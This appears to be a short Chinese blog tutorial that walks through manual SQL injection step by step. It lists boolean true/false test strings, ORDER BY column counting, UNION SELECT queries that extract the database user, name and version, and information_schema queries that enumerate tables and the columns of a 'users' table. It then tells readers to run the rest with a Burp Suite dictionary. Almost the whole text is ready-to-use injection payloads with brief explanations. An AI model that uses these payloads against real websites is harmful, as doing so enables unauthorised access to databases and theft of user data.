1' and 1=1--+(+代表空格)1' and 1=2--+(+代表空格)如果是真的话,会返回参数,如果是假的不会报错,逻辑语句被执行,证明有sql注入漏洞
1' order by 5--+(+代表空格) #无返回参数,说明超过列1' order by 2--+(+代表空格) #有返回参数,说明至少存在两个列1' union select null,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--+ (+代表空格)1'and 1=0 union select null,table_name from information_schema.tables#1'and 1=0 union select null,table_name from information_schema.columns where table_name='users'#1' and user is not null--+ (+代表空格)其他不演示了,之前演示过了,用bp字典去跑就行了 ,不明白地看我之前的文章!
| 留言与评论(共有 0 条评论) “” |